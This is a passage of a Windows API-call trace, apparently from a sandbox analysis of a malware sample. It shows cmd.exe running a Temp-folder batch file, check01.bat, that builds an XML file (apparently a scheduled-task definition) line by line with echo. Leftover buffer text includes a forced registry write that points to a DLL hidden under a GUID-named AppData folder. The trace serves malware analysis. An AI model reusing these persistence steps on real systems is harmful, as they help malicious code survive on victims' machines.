[0378.516] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0378.516] GetProcessHeap () returned 0x200000
[0378.516] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.517] GetProcessHeap () returned 0x200000
[0378.517] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.517] GetProcessHeap () returned 0x200000
[0378.517] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.517] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.517] GetProcessHeap () returned 0x200000
[0378.517] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.517] GetProcessHeap () returned 0x200000
[0378.518] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.518] GetProcessHeap () returned 0x200000
[0378.518] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.518] _tell (_FileHandle=3) returned 2132
[0378.519] _close (_FileHandle=3) returned 0
[0378.520] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.520] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.520] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.520] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.520] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.520] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.520] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.520] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.520] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.520] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.520] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.520] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.520] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.521] GetFileType (hFile=0x7) returned 0x2
[0378.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.522] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.523] _dup (_FileHandle=1) returned 3
[0378.524] _close (_FileHandle=1) returned 0
[0378.525] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.525] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.526] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.526] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.526] GetFileType (hFile=0x64) returned 0x1
[0378.526] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d8
[0378.526] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x3d7
[0378.527] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.527] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.527] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x21f4a0, Size=0x36) returned 0x216db0
[0378.527] GetProcessHeap () returned 0x200000
[0378.527] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x216db0) returned 0x36
[0378.528] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer=" \r\n") returned 18
[0378.528] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.528] GetFileType (hFile=0x64) returned 0x1
[0378.528] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.528] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \r\n", lpUsedDefaultChar=0x0) returned 19
[0378.528] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x12, lpOverlapped=0x0) returned 1
[0378.529] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.531] _close (_FileHandle=3) returned 0
[0378.533] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.533] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.534] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.534] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.535] SetConsoleInputExeNameW () returned 0x1
[0378.535] GetConsoleOutputCP () returned 0x1b5
[0378.535] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.535] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.536] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.536] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.536] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.536] SetFilePointer (in: hFile=0x64, lDistanceToMove=2132, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0378.536] GetProcessHeap () returned 0x200000
[0378.536] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0378.536] GetProcessHeap () returned 0x200000
[0378.537] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216db0 | out: hHeap=0x200000) returned 1
[0378.537] GetProcessHeap () returned 0x200000
[0378.537] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.537] GetProcessHeap () returned 0x200000
[0378.537] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.537] GetProcessHeap () returned 0x200000
[0378.537] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0378.537] GetProcessHeap () returned 0x200000
[0378.537] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.537] GetProcessHeap () returned 0x200000
[0378.537] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.537] GetProcessHeap () returned 0x200000
[0378.537] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.538] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.538] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x854
[0378.538] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x6de, lpOverlapped=0x0) returned 1
[0378.538] SetFilePointer (in: hFile=0x64, lDistanceToMove=2204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0378.538] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml\r\n", cbMultiByte=72, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml\r\n%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 72
[0378.538] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.538] GetFileType (hFile=0x64) returned 0x1
[0378.539] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.539] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0378.539] GetProcessHeap () returned 0x200000
[0378.539] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.539] GetProcessHeap () returned 0x200000
[0378.539] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.539] GetProcessHeap () returned 0x200000
[0378.539] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.539] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.539] GetProcessHeap () returned 0x200000
[0378.539] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.539] GetProcessHeap () returned 0x200000
[0378.540] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.540] GetProcessHeap () returned 0x200000
[0378.540] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.541] _tell (_FileHandle=3) returned 2204
[0378.541] _close (_FileHandle=3) returned 0
[0378.541] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.541] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.541] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.541] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.541] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.541] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.541] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.541] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.541] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.541] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.541] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.542] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.542] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.542] GetFileType (hFile=0x7) returned 0x2
[0378.542] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.542] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.543] _dup (_FileHandle=1) returned 3
[0378.544] _close (_FileHandle=1) returned 0
[0378.545] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.545] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.545] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.545] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.545] GetFileType (hFile=0x64) returned 0x1
[0378.546] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ea
[0378.546] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x3e9
[0378.546] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.547] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.547] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x72) returned 0x220470
[0378.547] GetProcessHeap () returned 0x200000
[0378.551] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x72
[0378.551] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="true \r\n") returned 48
[0378.551] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.551] GetFileType (hFile=0x64) returned 0x1
[0378.551] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.551] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="true \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="true \r\n", lpUsedDefaultChar=0x0) returned 49
[0378.551] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x30, lpOverlapped=0x0) returned 1
[0378.551] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.554] _close (_FileHandle=3) returned 0
[0378.555] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.555] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.555] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.556] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.556] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.556] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.557] SetConsoleInputExeNameW () returned 0x1
[0378.557] GetConsoleOutputCP () returned 0x1b5
[0378.557] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.557] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.558] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.558] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.558] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.558] SetFilePointer (in: hFile=0x64, lDistanceToMove=2204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0378.558] GetProcessHeap () returned 0x200000
[0378.558] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x231400 | out: hHeap=0x200000) returned 1
[0378.558] GetProcessHeap () returned 0x200000
[0378.559] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0378.559] GetProcessHeap () returned 0x200000
[0378.559] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.559] GetProcessHeap () returned 0x200000
[0378.559] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc70 | out: hHeap=0x200000) returned 1
[0378.559] GetProcessHeap () returned 0x200000
[0378.559] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.559] GetProcessHeap () returned 0x200000
[0378.559] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.559] GetProcessHeap () returned 0x200000
[0378.559] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.560] GetProcessHeap () returned 0x200000
[0378.560] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.560] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.560] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x89c
[0378.560] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x696, lpOverlapped=0x0) returned 1
[0378.560] SetFilePointer (in: hFile=0x64, lDistanceToMove=2252, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0378.560] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^true^ >> %temp%\\a.xml\r\n", cbMultiByte=48, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^true^ >> %temp%\\a.xml\r\nmand^> >> %temp%\\a.xml\r\n%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 48
[0378.561] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.561] GetFileType (hFile=0x64) returned 0x1
[0378.561] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.561] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0378.561] GetProcessHeap () returned 0x200000
[0378.561] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x2333d0
[0378.561] GetProcessHeap () returned 0x200000
[0378.561] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2373f0
[0378.561] GetProcessHeap () returned 0x200000
[0378.562] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0378.562] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0378.562] GetProcessHeap () returned 0x200000
[0378.562] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.562] GetProcessHeap () returned 0x200000
[0378.563] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2373f0 | out: hHeap=0x200000) returned 1
[0378.563] GetProcessHeap () returned 0x200000
[0378.563] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2333d0 | out: hHeap=0x200000) returned 1
[0378.563] _tell (_FileHandle=3) returned 2252
[0378.563] _close (_FileHandle=3) returned 0
[0378.564] _wcsicmp (_String1="echo", _String2="DIR") returned 1
[0378.564] _wcsicmp (_String1="echo", _String2="ERASE") returned -15
[0378.564] _wcsicmp (_String1="echo", _String2="DEL") returned 1
[0378.564] _wcsicmp (_String1="echo", _String2="TYPE") returned -15
[0378.564] _wcsicmp (_String1="echo", _String2="COPY") returned 2
[0378.564] _wcsicmp (_String1="echo", _String2="CD") returned 2
[0378.564] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2
[0378.564] _wcsicmp (_String1="echo", _String2="RENAME") returned -13
[0378.564] _wcsicmp (_String1="echo", _String2="REN") returned -13
[0378.564] _wcsicmp (_String1="echo", _String2="ECHO") returned 0
[0378.564] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.564] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.564] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.565] GetFileType (hFile=0x7) returned 0x2
[0378.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0378.565] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef2c8 | out: lpMode=0x1ef2c8) returned 1
[0378.566] _dup (_FileHandle=1) returned 3
[0378.567] _close (_FileHandle=1) returned 0
[0378.567] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", _String2="con") returned -53
[0378.568] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\a.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef278, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.568] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 1
[0378.568] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.568] GetFileType (hFile=0x64) returned 0x1
[0378.568] GetFileSize (in: hFile=0x64, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41a
[0378.568] SetFilePointer (in: hFile=0x64, lDistanceToMove=-1, lpDistanceToMoveHigh=0x1ef2d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1ef2d8*=0) returned 0x419
[0378.568] ReadFile (in: hFile=0x64, lpBuffer=0x1ef2c8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1ef270, lpOverlapped=0x0 | out: lpBuffer=0x1ef2c8*, lpNumberOfBytesRead=0x1ef270*=0x1, lpOverlapped=0x0) returned 1
[0378.568] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0378.569] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x233400, Size=0x42) returned 0x2286e0
[0378.569] GetProcessHeap () returned 0x200000
[0378.569] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x2286e0) returned 0x42
[0378.569] _vsnwprintf (in: _Buffer=0x4a296340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x1ef098 | out: _Buffer="true \r\n") returned 24
[0378.569] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.569] GetFileType (hFile=0x64) returned 0x1
[0378.569] _get_osfhandle (_FileHandle=1) returned 0x64
[0378.569] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="true \r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="true \r\n", lpUsedDefaultChar=0x0) returned 25
[0378.569] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x1ef068, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1ef068*=0x18, lpOverlapped=0x0) returned 1
[0378.570] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0378.572] _close (_FileHandle=3) returned 0
[0378.573] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.573] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0378.573] _get_osfhandle (_FileHandle=1) returned 0x7
[0378.573] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0378.574] _get_osfhandle (_FileHandle=0) returned 0x3
[0378.574] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0378.575] SetConsoleInputExeNameW () returned 0x1
[0378.575] GetConsoleOutputCP () returned 0x1b5
[0378.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0378.575] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0378.576] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0378.576] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0378.576] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.576] SetFilePointer (in: hFile=0x64, lDistanceToMove=2252, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0378.576] GetProcessHeap () returned 0x200000
[0378.576] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0378.576] GetProcessHeap () returned 0x200000
[0378.577] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2286e0 | out: hHeap=0x200000) returned 1
[0378.577] GetProcessHeap () returned 0x200000
[0378.577] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0378.577] GetProcessHeap () returned 0x200000
[0378.577] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0378.577] GetProcessHeap () returned 0x200000
[0378.577] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d30 | out: hHeap=0x200000) returned 1
[0378.577] GetProcessHeap () returned 0x200000
[0378.577] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0378.578] GetProcessHeap () returned 0x200000
[0378.578] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0378.578] GetProcessHeap () returned 0x200000
[0378.578] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0378.578] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.578] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8cc
[0378.578] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x666, lpOverlapped=0x0) returned 1
[0378.579] SetFilePointer (in: hFile=0x64, lDistanceToMove=2324, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x914
[0378.579] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^PT0S^ >> %temp%\\a.xml\r\n", cbMultiByte=72, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="echo ^PT0S^ >> %temp%\\a.xml\r\n%\\a.xml\r\n\\a.xml\r\n^> >> %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 72
[0378.579] _get_osfhandle (_FileHandle=3) returned 0x64
[0378.579] GetFileType (hFile=0x64) returned 0x1
[0378.579] _get_osfhandle (_FileHandle=3) returned 0x64
